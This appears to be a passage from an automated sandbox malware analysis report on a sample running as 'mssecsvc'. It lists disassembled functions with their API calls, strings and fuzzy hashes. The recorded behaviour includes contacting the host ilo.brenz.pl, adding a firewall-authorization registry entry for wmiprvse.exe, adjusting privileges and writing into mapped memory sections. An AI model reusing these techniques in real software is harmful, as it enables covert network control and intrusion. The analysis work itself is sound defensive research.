Opcode Fuzzy Hash: 4ad2ef6d84451204b22f2b8ef4fe8d4bb0979e9a2057be4b14859be0269e809c
Instruction Fuzzy Hash: A00181B0785344BAF7309B29CC4BF5B7929DF85B50F508558F609AE1C4DAB89A0483A9

Function 7FE324AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46stringnativeCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,\BaseNamedObjects\tghtVt), ref: 7FE324BA
lstrlenW.KERNEL32(?), ref: 7FE324C1
NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 7FE32516

Strings

\BaseNamedObjects\tghtVt, xrefs: 7FE324B8

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CreateSectionlstrcpylstrlen
String ID: \BaseNamedObjects\tghtVt
API String ID: 2597515329-4135269492
Opcode ID: 4ad2ef6d84451204b22f2b8ef4fe8d4bb0979e9a2057be4b14859be0269e809c
Instruction ID: 0292c1f03966230db6ce84df676d6ba47aebfc9b2aed9c2fd909e9cd6acd633d
Opcode Fuzzy Hash: 4ad2ef6d84451204b22f2b8ef4fe8d4bb0979e9a2057be4b14859be0269e809c
Instruction Fuzzy Hash: 240181B0785344BAF7309B29CC4BF5B7D29DF81B50F908558F608AE1C4DAB89A0483A9

Function 7FE3252F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,0000000E), ref: 7FE3255E

Strings

\BaseNamedObjects\tghtVt, xrefs: 7FE3254B

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: OpenSection
String ID: \BaseNamedObjects\tghtVt
API String ID: 1950954290-4135269492
Opcode ID: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
Instruction ID: cc492c20b74137972e1aeb42a549193fdcd5baff80c1f90c3202c4eb3a6ea2fd
Opcode Fuzzy Hash: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
Instruction Fuzzy Hash: A1E0DFF1342105BAFB288B19CC07FB7220DCBC0600F048604F918DA090E6F4AF104278

Function 7FE32574 Relevance: 3.1, APIs: 2, Instructions: 66nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 7FE3252F: NtOpenSection.NTDLL(?,0000000E), ref: 7FE3255E

NtMapViewOfSection.NTDLL(00000000,?,?,00000000,0000B7C4,00000000,?,00000002,00100000,00000040), ref: 7FE325A4
CloseHandle.KERNEL32(00000000,0000B7C4,00000000,?,00000002,00100000,00000040,00000000,0000B7C4,00000000,?,7FE30815), ref: 7FE325AC

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Section$CloseHandleOpenView
String ID:
API String ID: 2731707328-0
Opcode ID: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
Instruction ID: e7d13a3e482a8da5657dd6a73886d2e4a4dda0c602ab16e83e4cbce02dadacc4
Opcode Fuzzy Hash: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
Instruction Fuzzy Hash: F8213E70700746BBDB14DE65CD59FE97369EF80A44F800118E8AA8E1D4DBB2BF14C758

Function 7FE31422 Relevance: 3.0, APIs: 2, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FE3145A
NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FE3146A

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 3615134276-0
Opcode ID: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
Instruction ID: ddbff97e699881e74d61e2820170bd54818263a6fff0c1519b9bac5ac29647fb
Opcode Fuzzy Hash: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
Instruction Fuzzy Hash: 5BF0AE36542510BBD7205F56CD8EED77F28EF533A0F144556F4484E151C2624BA5D3F4

Function 7FE32477 Relevance: 3.0, APIs: 2, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,00000040), ref: 7FE3249B
NtWriteVirtualMemory.NTDLL ref: 7FE324A4

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: MemoryVirtual$ProtectWrite
String ID:
API String ID: 151266762-0
Opcode ID: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
Instruction ID: 6bbb67ea70d6ee96dfa5f1d7b4d314b28acc786a60d934acbd3f762ecc45b662
Opcode Fuzzy Hash: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
Instruction Fuzzy Hash: 2AE012E07502007FF5185F55DC5FF7B391DDB41751F410208FA0A981C4F9A15E18467A

Function 7FE3144A Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FE3145A
NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FE3146A

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 3615134276-0
Opcode ID: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
Instruction ID: ee32c209e3d0a2de55b6acbdbca8a3d00d8b73f2470e3acbbab87dcaf3c2c19a
Opcode Fuzzy Hash: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
Instruction Fuzzy Hash: F2D06731643034BBD6312A568C0EEE77D1DEF577A0F015041F9089A1A1C5A28EA1C7F5

Function 00AD28C8 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
Instruction ID: 406429b026924465ea2a2cd040e963c73021cb7c9ff8d88d77c809d26d1bf5b7
Opcode Fuzzy Hash: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
Instruction Fuzzy Hash: CE3118326006158BEB248F38C95079AB7F2FBA4304F10863DE557E7684D675FA89CBC0

Function 7FE328C8 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
Instruction ID: e18a2ce74cca8b86df4a39d81f49d59ab2303bce0ad49400a982515575b1261d
Opcode Fuzzy Hash: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
Instruction Fuzzy Hash: D631D372A006158BDB148E38C94479AB3F2FF84304F508638E596E7598D675F689CBC0

Function 00AD025E Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96ad574b5199e4eb2ac64a3604e1e07c41d2daa1cb0973a4f29ea5e3ea57c762
Instruction ID: 33ce09b432fd29607a36182d47245e1747817856dc38e302ef436aafa3afb5dc
Opcode Fuzzy Hash: 96ad574b5199e4eb2ac64a3604e1e07c41d2daa1cb0973a4f29ea5e3ea57c762
Instruction Fuzzy Hash: BA0178726041409BD720FF38CDC9FDEB7A1BB88730F10832AF5640B2C6D631A6858691

Function 7FE3025E Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96ad574b5199e4eb2ac64a3604e1e07c41d2daa1cb0973a4f29ea5e3ea57c762
Instruction ID: 888de4a15228707f089939356f70b0a19951ac6ae6b8219ea481353f72712a42
Opcode Fuzzy Hash: 96ad574b5199e4eb2ac64a3604e1e07c41d2daa1cb0973a4f29ea5e3ea57c762
Instruction Fuzzy Hash: 1F014972A042409BD310EF38CCCCE8EBBA1FFC4738F408355E6540A0C6D6319285C751

Function 00AD3F8F Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 224networkthreadlibraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00AD3F83), ref: 00AD3F8F
WSAStartup.WS2_32(00000101), ref: 00AD3FCE
CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00AD3FE9
CloseHandle.KERNEL32(?,00000000), ref: 00AD3FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00AD3FFF
lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00AD4057
gethostbyname.WS2_32(ilo.brenz.pl), ref: 00AD4066
socket.WS2_32(00000002,00000001,00000000), ref: 00AD4097
connect.WS2_32(6F6C6902,00AD3B09,00000010), ref: 00AD40B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 00AD40FB
wsprintfA.USER32 ref: 00AD4179
CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00AD41B4
CloseHandle.KERNEL32(?,00000000,6F6C6902,00AD6AA2,00000000,00000000), ref: 00AD41BD
GetTickCount.KERNEL32 ref: 00AD41F6
RtlExitUserThread.NTDLL(00000000), ref: 00AD4322

Strings

020a00 . . :#73204497e +*, xrefs: 00AD4195, 00AD41DB
D s, xrefs: 00AD414F
ilo.brenz.pl, xrefs: 00AD4056, 00AD4065

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CreateThread$CloseHandle$CountEventExitLibraryLoadStartupTickUserVersionconnectgethostbynamelstrlensocketwsprintf
String ID: 020a00 . . :#73204497e +*$D s$ilo.brenz.pl
API String ID: 3316401344-4285015596
Opcode ID: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
Instruction ID: 1dee271bfb2476958e4558e08f8fb348a07f9302348e2dd158ffe0e206f26ec2
Opcode Fuzzy Hash: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
Instruction Fuzzy Hash: 7491AA71508248BBEF319F24881DBEE7BADEF49310F04064AE95A9E281C3F45F45DB65

Function 7FE33F8F Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 224networkthreadlibraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(7FE33F83), ref: 7FE33F8F
WSAStartup.WS2_32(00000101), ref: 7FE33FCE
CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FE33FE9
CloseHandle.KERNEL32(?,00000000), ref: 7FE33FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FE33FFF
lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FE34057
gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FE34066
socket.WS2_32(00000002,00000001,00000000), ref: 7FE34097
connect.WS2_32(6F6C6902,7FE33B09,00000010), ref: 7FE340B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 7FE340FB
wsprintfA.USER32 ref: 7FE34179
CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FE341B4
CloseHandle.KERNEL32(?,00000000,6F6C6902,7FE36AA2,00000000,00000000), ref: 7FE341BD
GetTickCount.KERNEL32 ref: 7FE341F6
RtlExitUserThread.NTDLL(00000000), ref: 7FE34322

Strings

D s, xrefs: 7FE3414F
ilo.brenz.pl, xrefs: 7FE34056, 7FE34065
020a00 . . :#73204497e +*, xrefs: 7FE34195, 7FE341DB

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CreateThread$CloseHandle$CountEventExitLibraryLoadStartupTickUserVersionconnectgethostbynamelstrlensocketwsprintf
String ID: 020a00 . . :#73204497e +*$D s$ilo.brenz.pl
API String ID: 3316401344-4285015596
Opcode ID: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
Instruction ID: 7c9fe536247a5c46780dff2f9914419c1c0cb6178aa26be29099f7198b49843c
Opcode Fuzzy Hash: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
Instruction Fuzzy Hash: 4791AA75908348BAEB219F348C1DBDE7BADEF41304F804648E89AAE181C3F46F45DB65

Function 00AD3EB5 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 276networklibrarythreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00AD3EA9), ref: 00AD3EB5

Part of subcall function 00AD3ECC: GetProcAddress.KERNEL32(00000000,00AD3EC0), ref: 00AD3ECD
Part of subcall function 00AD3ECC: GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#73204497e +*,000000C8), ref: 00AD3EE2
Part of subcall function 00AD3ECC: wsprintfA.USER32 ref: 00AD3EF7
Part of subcall function 00AD3ECC: CreateThread.KERNEL32(00000000,00000000,00AD3691,00000000,00000000), ref: 00AD3F40
Part of subcall function 00AD3ECC: CloseHandle.KERNEL32(?,780B832E), ref: 00AD3F49

CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00AD3FE9
CloseHandle.KERNEL32(?,00000000), ref: 00AD3FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00AD3FFF
socket.WS2_32(00000002,00000001,00000000), ref: 00AD4097
connect.WS2_32(6F6C6902,00AD3B09,00000010), ref: 00AD40B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 00AD40FB
wsprintfA.USER32 ref: 00AD4179

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 00AD3EF6, 00AD3F08
020a00 . . :#73204497e +*, xrefs: 00AD3EDF, 00AD3EF4, 00AD3F0B, 00AD4195, 00AD41DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00AD3F0C
D s, xrefs: 00AD414F

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Create$CloseHandleThreadwsprintf$AddressEventFileLibraryLoadModuleNameProcVersionconnectsocket
String ID: 020a00 . . :#73204497e +*$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 4150863296-4169101916
Opcode ID: 09b915f81939338777e2238991f3bc6e2e241302df667124e3c5a6440f8bf480
Instruction ID: 08f1bd5ea2bd24c7f0372729cedc65329d68dd3f00e419b087008677bef09674
Opcode Fuzzy Hash: 09b915f81939338777e2238991f3bc6e2e241302df667124e3c5a6440f8bf480
Instruction Fuzzy Hash: F5A1E472508248BFEF219F248C5EBEA7BACEF45300F04454AF84A9E282D6F45F45C766

Function 7FE33EB5 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 276networklibrarythreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(7FE33EA9), ref: 7FE33EB5

Part of subcall function 7FE33ECC: GetProcAddress.KERNEL32(00000000,7FE33EC0), ref: 7FE33ECD
Part of subcall function 7FE33ECC: GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#73204497e +*,000000C8), ref: 7FE33EE2
Part of subcall function 7FE33ECC: wsprintfA.USER32 ref: 7FE33EF7
Part of subcall function 7FE33ECC: CreateThread.KERNEL32(00000000,00000000,7FE33691,00000000,00000000), ref: 7FE33F40
Part of subcall function 7FE33ECC: CloseHandle.KERNEL32(?,780B832E), ref: 7FE33F49

CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FE33FE9
CloseHandle.KERNEL32(?,00000000), ref: 7FE33FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FE33FFF
socket.WS2_32(00000002,00000001,00000000), ref: 7FE34097
connect.WS2_32(6F6C6902,7FE33B09,00000010), ref: 7FE340B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 7FE340FB
wsprintfA.USER32 ref: 7FE34179

Strings

D s, xrefs: 7FE3414F
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE33EF6, 7FE33F08
020a00 . . :#73204497e +*, xrefs: 7FE33EDF, 7FE33EF4, 7FE33F0B, 7FE34195, 7FE341DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE33F0C

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Create$CloseHandleThreadwsprintf$AddressEventFileLibraryLoadModuleNameProcVersionconnectsocket
String ID: 020a00 . . :#73204497e +*$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 4150863296-4169101916
Opcode ID: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
Instruction ID: 8c693793d3f8c52ddfbca026fea98ca92c48d2b5aba2df9ab50300905babb0d3
Opcode Fuzzy Hash: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
Instruction Fuzzy Hash: CCA1FF71909348BFEB219F248C5DBEA7BACEF41304F404659E84A9E181D6F46F05CBA6

Function 00AD3ECC Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 265threadlibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00AD3EC0), ref: 00AD3ECD
GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#73204497e +*,000000C8), ref: 00AD3EE2
wsprintfA.USER32 ref: 00AD3EF7
CreateThread.KERNEL32(00000000,00000000,00AD3691,00000000,00000000), ref: 00AD3F40
CloseHandle.KERNEL32(?,780B832E), ref: 00AD3F49
CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00AD3FE9
CloseHandle.KERNEL32(?,00000000), ref: 00AD3FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00AD3FFF

Part of subcall function 00AD3405: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00AD344A
Part of subcall function 00AD3405: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00AD3469
Part of subcall function 00AD3405: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00AD3493
Part of subcall function 00AD3405: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00AD34A0
Part of subcall function 00AD3405: UnmapViewOfFile.KERNEL32(?), ref: 00AD34B8

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 00AD3EF6, 00AD3F08
020a00 . . :#73204497e +*, xrefs: 00AD3EDF, 00AD3EF4, 00AD3F0B, 00AD4195, 00AD41DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00AD3F0C
D s, xrefs: 00AD414F

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle$ThreadView$AddressEventInformationModuleNameOpenProcQuerySectionSystemUnmapwsprintf
String ID: 020a00 . . :#73204497e +*$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 541178049-4169101916
Opcode ID: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
Instruction ID: 3b08a6f21a6f032fc46ac7b09b2da2e8ea85c946e13ce13a66d453487ac4a884
Opcode Fuzzy Hash: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
Instruction Fuzzy Hash: 50A1F172508258BFEF219F248C5EBEA7BACEF45300F04464AF84A9E281D6F45F45C766

Function 7FE33ECC Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 265threadlibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,7FE33EC0), ref: 7FE33ECD
GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#73204497e +*,000000C8), ref: 7FE33EE2
wsprintfA.USER32 ref: 7FE33EF7
CreateThread.KERNEL32(00000000,00000000,7FE33691,00000000,00000000), ref: 7FE33F40
CloseHandle.KERNEL32(?,780B832E), ref: 7FE33F49
CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FE33FE9
CloseHandle.KERNEL32(?,00000000), ref: 7FE33FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FE33FFF

Part of subcall function 7FE33405: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FE3344A
Part of subcall function 7FE33405: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FE33469
Part of subcall function 7FE33405: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FE33493
Part of subcall function 7FE33405: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FE334A0
Part of subcall function 7FE33405: UnmapViewOfFile.KERNEL32(?), ref: 7FE334B8

Strings

D s, xrefs: 7FE3414F
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE33EF6, 7FE33F08
020a00 . . :#73204497e +*, xrefs: 7FE33EDF, 7FE33EF4, 7FE33F0B, 7FE34195, 7FE341DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE33F0C

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle$ThreadView$AddressEventInformationModuleNameOpenProcQuerySectionSystemUnmapwsprintf
String ID: 020a00 . . :#73204497e +*$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 541178049-4169101916
Opcode ID: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
Instruction ID: 2f45cce052406d23afa77e2cf8ce3f3404a47b32eaf5d539eb941ba2e693fe40
Opcode Fuzzy Hash: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
Instruction Fuzzy Hash: A6A1F171909348BFEB219F248C5DBEA7BACEF41304F404659E84A9E181D6F46F05CBA5

Function 00AD3F60 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 215librarystringthreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00AD3F54), ref: 00AD3F60

Part of subcall function 00AD3F8F: LoadLibraryA.KERNEL32(00AD3F83), ref: 00AD3F8F
Part of subcall function 00AD3F8F: WSAStartup.WS2_32(00000101), ref: 00AD3FCE
Part of subcall function 00AD3F8F: CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00AD3FE9
Part of subcall function 00AD3F8F: CloseHandle.KERNEL32(?,00000000), ref: 00AD3FF2
Part of subcall function 00AD3F8F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00AD3FFF
Part of subcall function 00AD3F8F: socket.WS2_32(00000002,00000001,00000000), ref: 00AD4097
Part of subcall function 00AD3F8F: connect.WS2_32(6F6C6902,00AD3B09,00000010), ref: 00AD40B1
Part of subcall function 00AD3F8F: GetVersionExA.KERNEL32(?,?,00000000), ref: 00AD40FB

lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00AD4057
gethostbyname.WS2_32(ilo.brenz.pl), ref: 00AD4066
wsprintfA.USER32 ref: 00AD4179
CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00AD41B4
CloseHandle.KERNEL32(?,00000000,6F6C6902,00AD6AA2,00000000,00000000), ref: 00AD41BD
GetTickCount.KERNEL32 ref: 00AD41F6

Strings

020a00 . . :#73204497e +*, xrefs: 00AD4195, 00AD41DB
D s, xrefs: 00AD414F

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Create$CloseHandleLibraryLoadThread$CountEventStartupTickVersionconnectgethostbynamelstrlensocketwsprintf
String ID: 020a00 . . :#73204497e +*$D s
API String ID: 2996464229-1659677742
Opcode ID: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
Instruction ID: bd2c8825c1dd08b9171a9b9158a60f6e36d50570ec79d58d1db4fb8ca26d2939
Opcode Fuzzy Hash: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
Instruction Fuzzy Hash: EE81E072508258BFEB219F348C5DBEA7BACEF45310F04465AE85A9E2C2C2F45F45C762

Function 7FE33F60 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 215librarystringthreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(7FE33F54), ref: 7FE33F60

Part of subcall function 7FE33F8F: LoadLibraryA.KERNEL32(7FE33F83), ref: 7FE33F8F
Part of subcall function 7FE33F8F: WSAStartup.WS2_32(00000101), ref: 7FE33FCE
Part of subcall function 7FE33F8F: CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FE33FE9
Part of subcall function 7FE33F8F: CloseHandle.KERNEL32(?,00000000), ref: 7FE33FF2
Part of subcall function 7FE33F8F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FE33FFF
Part of subcall function 7FE33F8F: socket.WS2_32(00000002,00000001,00000000), ref: 7FE34097
Part of subcall function 7FE33F8F: connect.WS2_32(6F6C6902,7FE33B09,00000010), ref: 7FE340B1
Part of subcall function 7FE33F8F: GetVersionExA.KERNEL32(?,?,00000000), ref: 7FE340FB

